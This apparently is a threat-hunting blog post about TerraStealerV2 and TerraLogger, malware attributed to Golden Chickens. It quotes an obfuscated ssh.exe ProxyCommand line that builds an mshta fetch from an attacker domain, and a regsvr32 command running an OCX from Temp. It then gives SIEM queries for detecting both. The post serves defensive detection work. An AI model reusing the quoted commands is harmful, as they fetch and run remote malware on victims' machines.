123. Hunting for Golden Chickens' New Malware

Hello everyone!

Insikt Group uncovered two new malware families: TerraStealerV2 and TerraLogger. Both were attributed to the threat actor known as Golden Chickens. The adversary provides tools to other criminals operating a Malware-as-a-Service (MaaS) platform.

I've looked through the report, and (as always) caught a few detection and hunting opportunities.

For example, the adversary abused ssh.exe for proxying PowerShell execution:

ssh.exe" -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"

We can hunt for similar activity using the following query:

event_type: "processcreatewin"

AND

proc_file_name: "ssh.exe"

AND

cmdline: "proxycommand"

Next thing, abusing regsvr32.exe for executing a malicious OCX file:

regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx

We can use the following query to hunt for OCX files executions from Temp folders:

event_type: "processcreatewin"

AND

proc_file_name: "regsvr32.exe"

AND

cmdline: "temp" AND "ocx"

One more thing, the stealer uses ifconfig[.]me to collect information about the compromised system's IP address, we can also use it for hunting:

event_type: "dnsreq"

AND

dns_rname: "ifconfig.me"

Make sure you've checked the report - it's full of detection ideas!

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge